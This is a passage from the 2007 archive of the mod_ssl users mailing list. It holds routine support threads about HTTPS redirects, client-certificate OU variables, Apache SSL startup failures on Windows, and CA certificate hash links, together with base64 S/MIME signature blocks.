6HhQs3UfVSSU9+9+LwCJLHPpulN0IUw1yH2CC+xcBe3R/MRvY0g1XcnX6UJ4ikgjSvL/yO/3
O1lR6G/JqrWbsde2vYG1g1rUDEP6cv3j9eCd3OAaqzeH/jcWYVQ1gO8VoGLpUc2SXHRo8up6
7+81rMkUIY9ypgUpRQPbVdoLfKfJ+hNJqdsCAwEAAaOCAXMwggFvMAwGA1UdEwEB/wQCMAAw
VgYJYIZIAYb4QgENBEkWR1RvIGdldCB5b3VyIG93biBjZXJ0aWZpY2F0ZSBmb3IgRlJFRSBo
ZWFkIG92ZXIgdG8gaHR0cDovL3d3dy5DQWNlcnQub3JnMGIGA1UdJQRbMFkGCCsGAQUFBwME
BggrBgEFBQcDAgYIKwYBBQUHAwMGCisGAQQBgjcCARUGCisGAQQBgjcCARYGCisGAQQBgjcK
AwQGCisGAQQBgjcKAwMGCWCGSAGG+EIEATAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAGG
Fmh0dHA6Ly9vY3NwLmNhY2VydC5vcmcwbwYDVR0RBGgwZoEQYWFyb25AZGFsdG9ucy5jYYEO
YWFyb25AZmluY2guc3SBGWFhcm9uQHN1cGVyZHVwZXJnYW1lcy5vcmeBEWFhcm9uQGZyZWVi
c2Qub3JngRRhY2RhbHRvbkB1Y2FsZ2FyeS5jYTANBgkqhkiG9w0BAQUFAAOCAgEAAG+7Gc0x
ilvHS3WAuzS+AJ7CbswaTRvcIKP/sVwAkU1jxgc0cVzJ+umHd2V3b1LRTUK8cabknxTOx0fJ
yV6zNS/yNF5VEL6Mrep9rRIkK+7wMu3xg3qeuRC/3IrQUK9vy5oI2i9uQRK/LdhcQB80F582
Rk13gI31CGXhSrNUVKtVIexWYtdpaF9oMacAnjhhViTLU69jo08Kxpw+KqS9j0LSvqxhVx26
OaPQqGifCDvfgw2UbGMsgK7qDF265vtj6oLVAfZ/N4KfJgOj0fS430zs2FibaavWUjAhqGsO
+0x8I55NXa6ChwJYMeoJc58TGiVLzSiWRV6rC5j0rBDF7uMeK9qmZRxJ/DZHqpYxCEToUvOY
6qrEMzcR1Ft9Fwyz0+DM9THTaVWj9k12a8XVrsVwCtjy6VDbtnLaVojK7qV+9UnLIf/UR5g2
cqG1HSXN92Ro3IX7pIZTMNoZ1xiCQfQI1Bwkx8hdRxOZqh23TuGo7aSmkc/fbzjMqcAI32T9
u0L7GCvNADPOPvSgoHbmiRDZPxxf168kMWGAbfgbRQlj38clRFjgKSXrQ7sZOw1WWWjNlX0T
Th0qOD03Q6oLQ46+BjiYKZxCmaLRA+eO61nN/G0TQLd22LzEL9+ryoWjGRmZd+d371jlzRCX
iY7PJT5WiCHzFZ8yBoTXsryaTyExggMOMIIDCgIBATBaMFQxFDASBgNVBAoTC0NBY2VydCBJ
bmMuMR4wHAYDVQQLExVodHRwOi8vd3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBD
bGFzcyAzIFJvb3QCAi6dMAkGBSsOAwIaBQCgggGJMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0B
BwEwHAYJKoZIhvcNAQkFMQ8XDTA3MDgwMjE1MTYxMVowIwYJKoZIhvcNAQkEMRYEFJlrBSm3
IXxv8yoTC0QOwYjHvYckMFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcNAwcwDgYIKoZIhvcN
AwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEoMGkGCSsGAQQB
gjcQBDFcMFowVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cu
Q0FjZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdAICLp0wawYLKoZIhvcN
AQkQAgsxXKBaMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8vd3d3
LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QCAi6dMA0GCSqGSIb3
DQEBAQUABIIBAM+y0uAnPloskSqRzdO/jfaYinIzddV3x2unZ5H5dncU5zKKds2mckuJdNUr
JRF+70gctFNx7FGjSu4GAHKJAhlmkf/v9c1QrhMCCR/K9cvgLVuLp6Sq77rxaNuyZq3kvO2P
4drAlz2aAnCqcQ9+L6mjCa/xm19m0pLlQ6EVmN8oSgY5Yf7QhR8iybGSQPZWnpJ5SsAMiaMq
QWIzScO/ai/PZ2rhqxPZeN3YP5PeZgwW83bVUv45MNmsd8QemtPj3XuZjMD9uMTI39otGK0z
uQ4hTOtYUhgUjs6nr8K2ZP5dqQoEME4jBeC9AezC9TR2FDbq4EtVOmoNdmzrimnoirEAAAAA
AAA=
--------------ms050100080204030207040305--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  3 16:15:53 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1B1B214D885; Fri,  3 Aug 2007 16:15:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exanpcn27.arinc.com (exanpcn27.arinc.com [144.243.3.28])
	by master.modssl.org (Postfix) with ESMTP id 4E8A014D843
	for ; Fri,  3 Aug 2007 16:15:50 +0200 (CEST)
X-AuditID: 90f3031b-add5fbb0000006a4-e3-46b3389155d9
Received: from ANPCN2.arinc.com (unknown [144.243.79.42])
	by exanpcn27.arinc.com (Symantec Mail Security) with ESMTP id 344464E4003
	for ; Fri,  3 Aug 2007 10:15:45 -0400 (EDT)
Received: from ANPMB6.arinc.com ([144.243.79.44]) by ANPCN2.arinc.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Fri, 3 Aug 2007 10:15:42 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: Urgent help please
Date: Fri, 3 Aug 2007 10:15:41 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Urgent help please
Thread-Index: AcfV2BDh5FkZOzskSj2gYv/4ZXFcnw==
From: "Jones, Stephen  \(SJONES\)" 
To: 
X-OriginalArrivalTime: 03 Aug 2007 14:15:42.0389 (UTC) FILETIME=[C6895650:01C7D5D8]
X-Brightmail-Tracker: AAAAAA==
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jones, Stephen  \(SJONES\)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

My site just did a redesign and now the SSL's do not work as desired
and I have no clue why. =20

Here is the scenario:

The Home page on initial connection is NOT using SSL.=20

I can select any noon SSL page and remain a noon SSL page

I select one of the 2 SSL pages and I get SSL (ie: https in the address
bar and the lock icon in the browser)

>From this point on every page is now defined as SSL.  I see this by
picking
any link on the page and the link displayed in the lower left corner is
listed as https.  If I choose the link the address bar is https and the
lock icon appears.

The problem is that if I choose any of the links back to the Home page I
get the POP up "This page contains both secure and non secure item."

The address bar stays as https but the lock icon disappears.

No changes were made to the httpd.conf or ssl.conf files.

I have the following redirects in place and I can see the first 2
working when I enable rewrite logging.

I never see the 3rd one run.
=20
RewriteCond %{HTTPS}             !=3Don
RewriteCond %{REQUEST_URI}        ^.*/cf/store/.*
RewriteRule ^/(.*)                https://%{SERVER_NAME}/$1  [L,R]


## For Digsig
RewriteCond %{HTTPS}             !=3Don
RewriteCond %{REQUEST_URI}        ^.*/cf/digsig/.*
RewriteRule ^/(.*)                https://%{SERVER_NAME}/$1  [L,R]

## For Everything Else
RewriteCond %{HTTPS}            =3Don
RewriteCond %{REQUEST_URI}      ^.*/.*
RewriteRule ^/(.*)              http://%{SERVER_NAME}/$1 [L,R]

Any suggestions as to what or where to look would be greatly
appreciated.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  7 14:26:07 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F09B814D880; Tue,  7 Aug 2007 14:26:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cernmxlb.cern.ch (cernmx07.cern.ch [137.138.166.171])
	by master.modssl.org (Postfix) with ESMTP id 9A31514D82E
	for ; Tue,  7 Aug 2007 14:26:06 +0200 (CEST)
Keywords: CERN SpamKiller Note: -46 Charset: west-latin
X-Filter: CERNMX07 CERN MX v2.0 060921.0942 Release
Received: from cernfe01.cern.ch ([137.138.28.246]) by cernmxlb.cern.ch with Microsoft SMTPSVC(6.0.3790.1830);
	 Tue, 7 Aug 2007 14:26:00 +0200
Received: from lxplus218.cern.ch ([137.138.4.39]) by cernfe01.cern.ch over TLS secured channel with Microsoft SMTPSVC(6.0.3790.1830);
	 Tue, 7 Aug 2007 14:25:59 +0200
Date: Tue, 7 Aug 2007 14:25:54 +0200 (CEST)
From: Arsen Hayrapetyan 
X-X-Sender: ahairape@lxplus218.cern.ch
To: modssl-users@modssl.org
Subject: Multiple OU components in certificate subject DN and SSL_CLIENT_S_DN_OU
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-OriginalArrivalTime: 07 Aug 2007 12:25:59.0628 (UTC) FILETIME=[1C8EB8C0:01C7D8EE]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Arsen Hayrapetyan 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I am setting up client authentication with X.509 certificates.
The client has the certificate subject DN of the following form:
/C=XX/O=YYY/OU=ZZZ/OU=PPP/CN=TTT
I need to catch both OUs in my perl CGI script. But when I am trying to
get the values of OUs with the foolowing piece of code:

$variable=$ENV{SSL_CLIENT_S_DN_OU};
print "$variable \n";
$variable=$ENV{SSL_CLIENT_S_DN_OU};
print "$variable \n";

both print statements print ZZZ (the first OU).

How can I catch both OUs in my CGI script? Does mod_ssl "see" the first OU
only?

My apache version is 2.0.55. However I don't know the version of mod_ssl.
By the way, how can I determine what version of mod_ssl module do I have?

Thanks for the help in advance,
Arsen.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  7 15:17:34 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D39A414D880; Tue,  7 Aug 2007 15:17:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id E350314D82E
	for ; Tue,  7 Aug 2007 15:17:33 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.13.1/8.13.1) with ESMTP id l77DHNJl028384;
	Tue, 7 Aug 2007 09:17:23 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id l77DHMIK012399;
	Tue, 7 Aug 2007 09:17:22 -0400
Received: from localhost ([127.0.0.1] helo=radish.cambridge.redhat.com)
	by radish.cambridge.redhat.com with esmtps (TLSv1:AES256-SHA:256)
	(Exim 4.62)
	(envelope-from )
	id 1IIOw6-00029W-3i; Tue, 07 Aug 2007 14:17:22 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.8/8.13.8/Submit) id l77DHLoB008277;
	Tue, 7 Aug 2007 14:17:21 +0100
Date: Tue, 7 Aug 2007 14:17:21 +0100
From: Joe Orton 
To: Arsen Hayrapetyan 
Cc: modssl-users@modssl.org
Subject: Re: Multiple OU components in certificate subject DN and SSL_CLIENT_S_DN_OU
Message-ID: <20070807131721.GA1296@redhat.com>
Mail-Followup-To: Arsen Hayrapetyan ,
	modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Aug 07, 2007 at 02:25:54PM +0200, Arsen Hayrapetyan wrote:
> Hello,
> 
> I am setting up client authentication with X.509 certificates.
> The client has the certificate subject DN of the following form:
> /C=XX/O=YYY/OU=ZZZ/OU=PPP/CN=TTT
> I need to catch both OUs in my perl CGI script. But when I am trying to
> get the values of OUs with the foolowing piece of code:
> 
> $variable=$ENV{SSL_CLIENT_S_DN_OU};
> print "$variable \n";
> $variable=$ENV{SSL_CLIENT_S_DN_OU};
> print "$variable \n";
> 
> both print statements print ZZZ (the first OU).
> 
> How can I catch both OUs in my CGI script? Does mod_ssl "see" the first OU
> only?

It has access to them all, but only exports the first.

If you upgrade to 2.2.x, you could hack ssl_engine_kernel.c by adding:

 "SSL_CLIENT_S_DN_OU_0",
 "SSL_CLIENT_S_DN_OU_1",

to the ssl_hook_Fixup_vars[] array.  This will force the first and 
second OU field to be exported to CGI scripts in those named variables.  
Note that this won't work with 2.0.x, which doesn't support the _N 
suffix.

> My apache version is 2.0.55. However I don't know the version of mod_ssl.
> By the way, how can I determine what version of mod_ssl module do I have?

mod_ssl is integrated into the httpd 2.x tree, so there is no separate 
"versino".

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  8 08:15:49 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8F7B614D89E; Wed,  8 Aug 2007 08:15:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 7E4D214D833
	for ; Wed,  8 Aug 2007 08:15:48 +0200 (CEST)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1IIepa-0001fi-2e
	for modssl-users@modssl.org; Tue, 07 Aug 2007 23:15:42 -0700
Message-ID: <12035214.post@talk.nabble.com>
Date: Tue, 7 Aug 2007 23:15:42 -0700 (PDT)
From: Mario Becker-Reinhold 
To: modssl-users@modssl.org
Subject: Apache does not start after including ssl
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_37556_22315036.1186553742076"
X-Nabble-From: mario.1981@gmx.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mario Becker-Reinhold 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_37556_22315036.1186553742076
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


Hello at all,

my problem is very difficult, but at least short to describe :-/
The apache crasht after starting if I have included the ssl module.

Okay, let me make the problem a litte bit more difficult as giving you my
system configuration:

- Windows 2k

- Apache 2.2.4

- Win32OpenSSL 0.9.8e (http://www.slproweb.com/products/Win32OpenSSL.html)


I searched for several tutorials to get a running configuration, but there
are all configurations for Apache 1.x. - mostly with the notice that the
configuration for apache 2.x is very different than for 1.x. But I tried it
nevertheless. I have installed openssl, and I created the certificate with
this lines:

req -config openssl.cnf -new -out test-zertifikat.csr

rsa -in privkey.pem -out test-zertifikat.key

x509 -in test-zertifikat.csr -out test-zertifikat.crt -req -signkey
test-zertifikat.key -days 365

x509 -in test-zertifikat.crt -out test-zertifikat.der.crt -outform DER


Then I put the created files into the apache folder (conf/ssl), and changed
the httpd.conf. There I added the following lines at the end of the file:


Listen 8080

Listen 443


LoadModule ssl_module "C:/Apache2.2/modules/mod_ssl.so"



SSLRandomSeed startup builtin

SSLRandomSeed connect builtin



SSLMutex sem

SSLRandomSeed startup builtin

SSLSessionCache none


SSLLog logs/SSL.log

SSLLogLevel info



ServerName webdavtest

DocumentRoot C:/Apache2.2/htdocs/ssl

SSLEngine On

SSLCertificateFile conf/ssl/test-zertifikat.crt

SSLCertificateKeyFile conf/ssl/test-zertifikat.key





Then I start the apache service from the apache monitor, and after 1 second
the start fails with the message: "The requested operation has failed." But
there is no other hint, what could be the problem. All error logs are empty.
So Im very confused about that.

My hope is now, that anybody of you has running the apache 2.2 with ssl
under windows, and can me give some hints. Or does anybody other see, what
could be the problem?

As you see also, I'm not very familiar with the apache configuration. The
mean goal of the project should be, that I can use WebDAV about a secure
https connetion.

Thanks for reading :-)


Regards

Mario Becker-Reinhold

-- 
View this message in context: http://www.nabble.com/Apache-does-not-start-after-including-ssl-tf4230417.html#a12035214
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

------=_Part_37556_22315036.1186553742076
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit


Hello at all,

my problem is very difficult, but at least short to describe :-/
The apache crasht after starting if I have included the ssl module.


Okay, let me make the problem a litte bit more difficult as giving you my system configuration:


- Windows 2k

- Apache 2.2.4

- Win32OpenSSL 0.9.8e (http://www.slproweb.com/products/Win32OpenSSL.html)



I searched for several tutorials to get a running configuration, but there are all configurations for Apache 1.x. - mostly with the notice that the configuration for apache 2.x is very different than for 1.x. But I tried it nevertheless. I have installed openssl, and I created the certificate with this lines:


req -config openssl.cnf -new -out test-zertifikat.csr

rsa -in privkey.pem -out test-zertifikat.key

x509 -in test-zertifikat.csr -out test-zertifikat.crt -req -signkey test-zertifikat.key -days 365

x509 -in test-zertifikat.crt -out test-zertifikat.der.crt -outform DER



Then I put the created files into the apache folder (conf/ssl), and changed the httpd.conf. There I added the following lines at the end of the file:



Listen 8080

Listen 443


LoadModule ssl_module "C:/Apache2.2/modules/mod_ssl.so"




SSLRandomSeed startup builtin

SSLRandomSeed connect builtin




SSLMutex sem

SSLRandomSeed startup builtin

SSLSessionCache none


SSLLog logs/SSL.log

SSLLogLevel info




ServerName webdavtest

DocumentRoot C:/Apache2.2/htdocs/ssl

SSLEngine On

SSLCertificateFile conf/ssl/test-zertifikat.crt

SSLCertificateKeyFile conf/ssl/test-zertifikat.key







Then I start the apache service from the apache monitor, and after 1 second the start fails with the message: "The requested operation has failed." But there is no other hint, what could be the problem. All error logs are empty. So Im very confused about that.


My hope is now, that anybody of you has running the apache 2.2 with ssl under windows, and can me give some hints. Or does anybody other see, what could be the problem?

As you see also, I'm not very familiar with the apache configuration. The mean goal of the project should be, that I can use WebDAV about a secure https connetion.


Thanks for reading :-)



Regards

Mario Becker-Reinhold



View this message in context: Apache does not start after including ssl

Sent from the mod_ssl - Users mailing list archive at Nabble.com.


------=_Part_37556_22315036.1186553742076--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  8 14:26:24 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F0DA014D8B3; Wed,  8 Aug 2007 14:26:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cernmxlb.cern.ch (cernmx07.cern.ch [137.138.166.171])
	by master.modssl.org (Postfix) with ESMTP id BA37914D85D
	for ; Wed,  8 Aug 2007 14:26:21 +0200 (CEST)
Keywords: CERN SpamKiller Note: -50 Charset: west-latin
X-Filter: CERNMX07 CERN MX v2.0 060921.0942 Release
Received: from cernfe03.cern.ch ([137.138.28.244]) by cernmxlb.cern.ch with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 8 Aug 2007 14:26:15 +0200
Received: from lxplus217.cern.ch ([137.138.4.38]) by cernfe03.cern.ch over TLS secured channel with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 8 Aug 2007 14:26:14 +0200
Date: Wed, 8 Aug 2007 14:26:05 +0200 (CEST)
From: Arsen Hayrapetyan 
X-X-Sender: ahairape@lxplus217.cern.ch
To: modssl-users@modssl.org
Subject: SSLCACertificatePath directive
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-OriginalArrivalTime: 08 Aug 2007 12:26:14.0989 (UTC) FILETIME=[50205FD0:01C7D9B7]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Arsen Hayrapetyan 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have a bunch of certificates of CAs which I want to put in directory 
pointed by SSLCACertificatePath directive. All of them have the filenames 
in the form hash-value.0 The mod_ssl official documentation says:
"The files in this directory have to be ... accessible through hash 
names. So usually you can't just place the certificate files there: you 
also have to create symbolic links named hash-value.N".

1) What should be N in the CA certificate file name? Should 
certificate file names have sequential N's, reflecting the prefered 
order of checking against them during client authentication? 

2) Are symbolic links mandatory? Can I put the hash-value.N files there 
without creating the links?

Thanks in advance,
Arsen.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  8 19:54:12 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7052314D876; Wed,  8 Aug 2007 19:54:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bangladesh.disa.mil (bangladesh.disa.mil [198.22.28.100])
	by master.modssl.org (Postfix) with ESMTP id 6234E14D833
	for ; Wed,  8 Aug 2007 19:54:10 +0200 (CEST)
Content-class: urn:content-classes:message
MIME-Version: 1.0
X-MimeOLE: Produced By Microsoft Exchange V6.5
Subject: RE: SSLCACertificatePath directive (UNCLASSIFIED)
Date: Wed, 8 Aug 2007 07:53:59 -1000
Content-Type: multipart/signed;
	protocol="application/x-pkcs7-signature";
	micalg=SHA1;
	boundary="----=_NextPart_000_001D_01C7D991.477D5570"
Message-ID: <87FC85CC4AE9C94D9EF34083790C610F57019A@bangladesh.disanet.disa-u.mil>
In-Reply-To: 
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator: 
Thread-Topic: SSLCACertificatePath directive (UNCLASSIFIED)
Thread-Index: AcfZt1g0ZsrJRArKQNGDogYY8n5aFQALXqQA
References: 
From: "Victor, Dwight P CTR DISA PAC" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Victor, Dwight P CTR DISA PAC" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_001D_01C7D991.477D5570
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Classification:  UNCLASSIFIED 
Caveats: NONE


Hello Arsen,

If you're using mod_ssl/OpenSSL on Linux, I know you can use the c_rehash
command to automatically create the required symoblic links.  On my install,
c_rehash is in the /usr/local/bin directory.

Hope that helps,

Dwight...

---
Dwight Victor, CISSP (Contractor)
DISA-PAC EMSS Gateway Hawaii
EMAIL: dwight.victor.ctr@disa.mil
TEL:   (808) 653-3677 ext 229

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Arsen Hayrapetyan
Sent: Wednesday, August 08, 2007 2:26 AM
To: modssl-users@modssl.org
Subject: SSLCACertificatePath directive

Hello,

I have a bunch of certificates of CAs which I want to put in directory
pointed by SSLCACertificatePath directive. All of them have the filenames in
the form hash-value.0 The mod_ssl official documentation says:
"The files in this directory have to be ... accessible through hash names.
So usually you can't just place the certificate files there: you also have
to create symbolic links named hash-value.N".

1) What should be N in the CA certificate file name? Should certificate file
names have sequential N's, reflecting the prefered order of checking against
them during client authentication? 

2) Are symbolic links mandatory? Can I put the hash-value.N files there
without creating the links?

Thanks in advance,
Arsen.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
Classification:  UNCLASSIFIED 
Caveats: NONE


------=_NextPart_000_001D_01C7D991.477D5570
Content-Type: application/x-pkcs7-signature;
	name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="smime.p7s"

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIS4jCCAmcw
ggHQoAMCAQICAQQwDQYJKoZIhvcNAQEFBQAwYTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4g
R292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxHDAaBgNVBAMTE0RvRCBDTEFT
UyAzIFJvb3QgQ0EwHhcNMDAwNTE5MTMxMzAwWhcNMjAwNTE0MTMxMzAwWjBhMQswCQYDVQQGEwJV
UzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEc
MBoGA1UEAxMTRG9EIENMQVNTIDMgUm9vdCBDQTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA
tTD+ZL7qzG3tgSz3f+kZug5paijhqanLlVgf8eaaaVPgiD+RxVG5Y5eo5iGME142PKhX+vhwLExq
y78wp0wW5DJc+BKwUfgWV40vtE36LqiU6Cph1FcNR85uLC9+mGfMAAirtpYWNcKFkeVboArHZlJi
82F1lReuvCpWKaXgK1MCAwEAAaMvMC0wHQYDVR0OBBYEFGycpfBcj21BjcQXO5BXwg+jzW3+MAwG
A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADgYEAr3FE+ZcjzGhpjEMHQbqIILMiAEHImKBVHM0/
brGTXK36GJq7HHNv/SRCj4efUc++hp/p14pITwjZaZSsP+YPLZcPKJN2T2Lf/6DNYfimhgwxNCDc
fy+o+zm+le44WQJiwd5sFU/g35275HlzJP1jZJX3SqiZH0hllcd7v3gy53owggP0MIIDXaADAgEC
AgMZ8dMwDQYJKoZIhvcNAQEFBQAwXzELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJu
bWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxGjAYBgNVBAMTEURPRCBDTEFTUyAzIENB
LTEwMB4XDTA1MTAxMTAwMDAwMFoXDTA4MTAwMzIzNTk1OVowgYIxCzAJBgNVBAYTAlVTMRgwFgYD
VQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoGA1UECxMDUEtJMRMwEQYDVQQL
EwpDT05UUkFDVE9SMSgwJgYDVQQDEx9WSUNUT1IuRFdJR0hULlBISUxJUC4xMjY4NzczMTA2MIGf
MA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCGtatc27IN+5VIX07ErsMMt88n7NsRUQj6dItWA6c4
RFU+rcLdfByywAr4DWTMFFMYkL0CGmmdOTaZA8W4jWt3X++7elikr4LWmmoUv0/WqY7Bye3w0Dwc
y0WwLKi5Uy8PCqdfN2/kaPpLFWln27ACPi/V5Zdlt2kX4YQHNSrp2QIDAQABo4IBmDCCAZQwDgYD
VR0PAQH/BAQDAgbAMB8GA1UdIwQYMBaAFDUnGjCMHk2mYHu3LTpGLkupLyswMB0GA1UdDgQWBBR4
N9gb8hTWkNf4y/Zs9AZ2rwAKLjAWBgNVHSAEDzANMAsGCWCGSAFlAgELCTB9BgNVHRIEdjB0hnJs
ZGFwOi8vZHMtNC5jM3BraS5kZW4uZGlzYS5taWwvY24lM2RET0QlMjBDTEFTUyUyMDMlMjBDQS0x
MCUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVMw
gaoGA1UdHwSBojCBnzCBnKCBmaCBloaBk2xkYXA6Ly9kcy00LmMzcGtpLmRlbi5kaXNhLm1pbC9j
biUzZERPRCUyMENMQVNTJTIwMyUyMENBLTEwJTJjb3UlM2RQS0klMmNvdSUzZERvRCUyY28lM2RV
LlMuJTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0O2JpbmFy
eTANBgkqhkiG9w0BAQUFAAOBgQARGOMmXEyNRvTInT4IdnavBhh7siT2sCMtI/TlRuqO93rj5/ji
